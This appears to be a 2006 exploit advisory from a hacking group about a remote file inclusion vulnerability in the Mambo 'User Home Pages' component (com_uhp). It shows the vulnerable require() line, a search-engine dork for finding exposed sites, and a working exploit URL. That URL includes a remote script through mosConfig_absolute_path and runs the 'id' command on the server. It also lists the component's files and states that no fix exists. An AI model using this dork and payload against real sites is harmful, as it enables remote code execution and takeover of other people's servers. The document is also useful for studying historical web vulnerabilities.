Mambo User Home Pages Component <= 0.5 Remote Include Vulnerability

2006-07-30 00:00:00

>>> Kurdish Security

>>> Freedom For Ocalan

>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

>>> Rish : High

>>> Class : Remote

>>> Script : User Home Pges

>>> Site : www.ravensportal.co.uk

>>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends

Code :

global $mosConfig_absolute_path;
require($mosConfig_absolute_path."/administrator/components/com_uhp/uhp_config.inc");

d0rkiz : allinurl:"com_uhp"

http://www.w0rkzsite.com/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=y0urscripts.txt?&cmd=id

And used link :]

footer.php
functions.php
install.uhp.php
toolbar.uhp.html.php
uhp.class.php
uhp_config.php
uninstall.uhp.php

#

Fixes

No fixes

In order to submit a new fix you need to be registered.